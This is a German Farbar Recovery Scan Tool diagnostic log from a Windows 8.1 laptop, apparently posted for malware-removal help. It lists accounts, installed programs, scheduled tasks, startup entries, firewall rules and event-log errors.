C:\WINDOWS\AppReadiness 2016-03-28 23:13 - 2013-09-07 18:10 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD 2016-03-28 23:10 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator 2016-03-22 03:13 - 2014-12-25 19:50 - 00000000 ____D C:\WINDOWS\system32\appraiser 2016-03-22 03:12 - 2013-09-09 14:33 - 00000000 ____D C:\WINDOWS\system32\MRT 2016-03-22 03:08 - 2013-09-09 14:33 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2016-03-22 00:21 - 2014-05-14 21:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2016-03-21 23:32 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps 2016-03-21 23:15 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\System 2016-03-21 22:57 - 2016-01-28 10:48 - 00000000 ____D C:\Users\Denny\AppData\Local\CrashDumps 2016-03-21 18:50 - 2015-10-26 21:57 - 00000000 ____D C:\WINDOWS\Minidump 2016-03-21 18:16 - 2016-01-28 10:50 - 00000000 ____D C:\Users\Denny\AppData\Local\Tempfolder 2016-03-21 17:36 - 2013-08-22 16:44 - 00590976 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2016-03-21 17:17 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\FxsTmp 2016-03-21 16:11 - 2016-01-18 20:30 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2016-03-21 16:11 - 2016-01-18 20:30 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-03-11 09:50 - 2013-09-15 13:17 - 00000000 ____D C:\Users\Denny\Documents\Rechnungen DS-KFZ 2016-03-09 18:38 - 2013-08-22 17:36 - 00000000 ___RD C:\WINDOWS\ToastData 2016-03-09 09:37 - 2013-09-30 05:59 - 00000000 ____D C:\Program Files\Windows Journal 2016-03-08 12:35 - 2016-02-05 00:36 - 00000000 ____D C:\Users\Denny\AppData\Local\Chromium 2016-03-08 12:08 - 2013-11-10 15:12 - 00267264 ___SH C:\Users\Denny\Desktop\Thumbs.db 2016-03-08 12:04 - 2013-10-24 13:25 - 00000000 ___DC C:\WINDOWS\Panther 2016-03-07 21:43 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\NDF ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2013-06-29 02:24 - 2013-06-29 02:24 - 0000000 ____H () C:\ProgramData\DP45977C.lfl 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLes.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLet.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLev.DAT Einige Dateien in TEMP: ==================== C:\Users\Denny\AppData\Local\Temp\avgnt.exe ==================== Bamital & volsnap ================= (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert C:\WINDOWS\explorer.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert C:\WINDOWS\system32\services.exe => Datei ist digital signiert C:\WINDOWS\system32\User32.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert LastRegBack: 2016-03-30 14:04 ==================== Ende von FRST.txt ============================ FRST-Addition Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Denny (2016-03-30 14:44:43)
Gestartet von C:\Users\Denny\Desktop
Windows 8.1 (X64) (2013-10-24 10:59:13)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1569062512-718196537-2772323438-500 - Administrator - Enabled) => C:\Users\Administrator.Schneider
Denny (S-1-5-21-1569062512-718196537-2772323438-1001 - Administrator - Enabled) => C:\Users\Denny
Gast (S-1-5-21-1569062512-718196537-2772323438-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1569062512-718196537-2772323438-1005 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Acer Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.03.3000 - Acer Incorporated)
Acer Docs Office AddIn (HKLM-x32\...\{DCBF3379-246B-47E1-8173-639B63940838}) (Version: 2.04.2005 - Acer)
Acer Launch Manager (HKLM\...\{C18D55BD-1EC6-466D-B763-8EEDDDA9100E}) (Version: 8.00.3003 - Acer Incorporated)
Acer Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.04.3002.6 - Acer Incorporated)
Acer Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.04.3003.1 - Acer Incorporated)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.04.3004 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3012 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3016 - Acer Incorporated)
Acer Remote Files (HKLM\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 1.02.3001 - Acer Incorporated)
Acer USB Charge Manager (HKLM\...\{07E867C5-0C48-40FF-A013-DDAF4565AD47}) (Version: 2.00.3004 - Acer Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 4.0.0.1390 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.0.413 - Adobe Systems Incorporated)
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.6 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Photoshop Elements 13 (HKLM-x32\...\{609818B9-23EB-4196-B466-EFE05E92A32F}) (Version: 13.0 - Adobe Systems Incorporated)
Amazon 1Button App (x32 Version: 1.0.6 - Amazon) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG)
clear.fi SDK - Video 2 (x32 Version: 2.2.2722 - CyberLink Corp.) Hidden
clear.fi SDK- Movie 2 (x32 Version: 2.2.2729 - CyberLink Corp.) Hidden
CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3729_45993 - CyberLink Corp.)
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc)
Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.61.0000 - EPSON)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
EPSON XP-700 Series Printer Uninstall (HKLM\...\EPSON XP-700 Series) (Version: - SEIKO EPSON Corporation)
HID Monitor (HKLM-x32\...\{31923C55-8208-4D0A-8AD6-3AE099A1A741}) (Version: 1.1.5 - Acer Incorporated)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3006 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1281 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Malwarebytes Anti-Malware Version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Mozilla Firefox 45.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 de)) (Version: 45.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0.1 - Mozilla)
Nero BackItUp 12 Essentials OEM.a01 (HKLM-x32\...\{4CA8F973-6377-4ABF-9ED5-CC2323B3C000}) (Version: 12.5.00500 - Nero AG)
Nero MediaHome Free (HKLM-x32\...\{6CC8CA12-AD2B-4C07-B2C4-B32CDBF5F29D}) (Version: 15.0.01800 - Nero AG)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.0.1 - Nikon)
Picture Control Utility (HKLM-x32\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.2.2 - Nikon)
Prerequisite installer (x32 Version: 12.0.0003 - Nero AG) Hidden
Prerequisite installer (x32 Version: 15.0.0005 - Nero AG) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.222 - Qualcomm Atheros Communications)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.14.327.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6870 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C9661090-C134-46E8-90B2-76D72355C2A6}) (Version: 6.2.9200.21222 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Samsung Link 1.8.0.1403131552 (HKLM\...\8474-7877-9059-0204) (Version: 1.8.0.1403131552 - Copyright 2013 SAMSUNG)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.33.0 - SAMSUNG Electronics Co., Ltd.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SonyEditor (remove only) (HKLM-x32\...\SonyEditor) (Version: - )
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-1569062512-718196537-2772323438-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {1297570B-38F1-49A5-A941-B11ED2E003D4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-05] (Adobe Systems Incorporated)
Task: {45E15A8F-D60A-4899-94EE-F2D2FFC44C1D} - System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} => C:\WINDOWS\system32\regsvr32.exe [2014-10-29] (Microsoft Corporation)
Task: {582339AA-55CB-446D-9C0A-E237D27C9460} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2013-02-08] (CyberLink)
Task: {6631CA39-E6CA-443E-A7B3-C72F37978029} - System32\Tasks\{12146BCF-AB85-4EF1-B4A9-E5E62ADD7B59} => pcalua.exe -a "C:\Program Files (x86)\GUPlayer\Uninstaller.exe" -d "C:\Program Files (x86)\GUPlayer"
Task: {691F8DB4-04E1-4275-8E3C-4A02A8A0BF55} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-22] (Microsoft Corporation)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2013-10-31 18:49 - 2014-03-13 16:52 - 00013824 _____ () C:\Program Files\Samsung\Samsung Link\JniSys.dll
2016-03-30 13:53 - 2016-03-30 13:53 - 00515584 _____ () C:\Windows\Temp\sqlite-3.7.2-sqlitejdbc.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 02149376 _____ () C:\Program Files\Samsung\Samsung Link\scone_proxy.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 01630720 _____ () C:\Program Files\Samsung\Samsung Link\scone_stub.dll
2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-30 03:41 - 2010-01-30 03:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-06-29 02:11 - 2013-02-18 07:38 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\acer01.jpg
DNS Servers: Datenträger ist nicht mit dem Internet verbunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKLM\...\StartupApproved\Run: => "ETDCtrl"
HKLM\...\StartupApproved\Run: => "Samsung Link"
HKLM\...\StartupApproved\Run: => "3D BubbleSound"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "Nikon Message Center 2"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "Registry Helper"
HKLM\...\StartupApproved\Run32: => "fst_de_19"
HKLM\...\StartupApproved\Run32: => "t4pc_en_3"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "gmsd_de_005010126"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => " QQPCTray"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "OneNote 2010 Bildschirmausschnitt- und Startprogramm.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "hqghumeaylnlf.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\Run: => "CAHeadless"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{290FEF21-DC28-4CDB-84A3-0CF48C59C53F}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{53F21F5D-793A-40CD-BE18-64DC327CAC74}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{9366E490-4066-453E-A63E-30D38D3C4385}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\VideoPlayer.exe
FirewallRules: [{957FF23A-1843-4C65-BBCF-377F30A37421}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{9FC26195-3C09-4CCF-91F4-496AAC3E0579}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{6F98C6CA-669A-49BB-A000-DCBC70357288}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{2E6F58D2-F1DA-40A7-B824-7BFBEC8C62F3}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{B82CCA82-236A-4606-B2A1-6683CE2BB5E1}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{710D6FB0-C282-43DE-94B6-5DA25FA840BA}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{B0B96A98-BB54-4416-95EF-A4FFA1D3E92A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{22649299-4229-4001-9C23-2C8EF0D021C6}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{75C220A7-7912-4649-96E4-1C6D42C27C3F}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{A945E41D-11DC-484D-A439-8F75665FF810}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{118DE993-AB64-4609-8043-8989F6E196A0}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{297E9E38-6323-4850-8793-890A4E1205BB}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{1BA61F3A-7C93-4D2E-B332-92CF5BE489EC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{DC615730-96FE-44BE-9092-C23B56CDB009}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{5F0C690B-51F3-4FFA-8EEE-C5829966CB9B}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{6F77C27B-B0FA-4B07-B15E-9913C71FC2BB}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{EFBAC9EC-6AAB-4AE6-88EE-873AD8ABC7E1}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{0D61EDDD-3DAD-4D0E-85F1-F7152ED3BEC4}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{55C9BFD4-E19A-4C09-A550-EA815A77F875}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{368618D4-80BD-47EC-B00A-554CCFD16ECC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{D5705000-430A-4DE7-B504-F3176E52BD62}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{10AAFB71-519E-4031-9E51-E38B666F3808}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{147C84EE-5F68-49BF-A093-CEBEEBD1F845}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{57FBBC48-338F-4339-B94A-B6F949FAE9E4}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{484626A6-A444-4833-BEAF-C493E3DB322D}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{80B4DFDA-F518-4EE4-A150-A2CD466AD4BD}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{479688D5-1CD3-4C96-8C3F-98DAA8676511}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{684F9EC8-CE62-45CF-8C0A-E600CB6770E5}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{2932FB41-9623-445B-B74C-AB39C41E41D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{FA7AD37A-61AE-4AC5-90E8-0ACB0E02C82A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{B8380D2E-28B4-4239-B1FC-E21AD7DB6507}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0144819F-7C36-4E95-8468-A54663C763D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{682BEC69-6576-4675-9D34-3195707A8D30}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{A5EA98FB-B16F-4B86-B9F3-3F7B725FEA14}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{C2F25F89-9DFD-4DEF-B157-4A68AA57BEF1}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{40733857-3854-4F7D-ABAD-8839839E1CA3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{1AF1DCBF-BCE3-4798-B587-7124462DB377}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{AA88FEE8-E662-4ADE-9A23-27CD92A2A4C3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{217A8D6B-829D-4AE5-B0F9-93F9AD735CC2}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0F2CD704-F53C-42B9-8565-E6AF5F373409}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{60A20179-977C-4925-BD45-186CC74D8B19}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{00ADB8FE-4D9E-4B3D-B9AB-6474FEB64908}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{01BD45EA-2486-4F1B-B219-B768D7AC80D4}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{DA460DCD-D762-4AA5-81BD-338370077CB1}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{95170546-A139-4F6A-B54E-110BAA90A507}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{72068411-0556-4539-BC7C-535A80472C40}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{C2658416-A2DF-4190-A1C5-4CFAAC757C0E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8588E4BB-3623-4737-ABB4-DEE15F85D85B}] => (Allow) C:\Users\Denny\AppData\Local\Chromium\Application\chrome.exe
==================== Wiederherstellungspunkte =========================
22-03-2016 02:55:07 JRT Pre-Junkware Removal
29-03-2016 12:45:27 Windows Modules Installer
30-03-2016 12:51:51 Revo Uninstaller's restore point - Google Chrome
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (03/30/2016 02:08:02 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/30/2016 02:08:02 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/30/2016 02:08:02 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/30/2016 02:08:02 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/30/2016 02:07:55 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/30/2016 02:07:55 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/30/2016 02:07:55 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/30/2016 01:55:00 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/30/2016 01:55:00 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
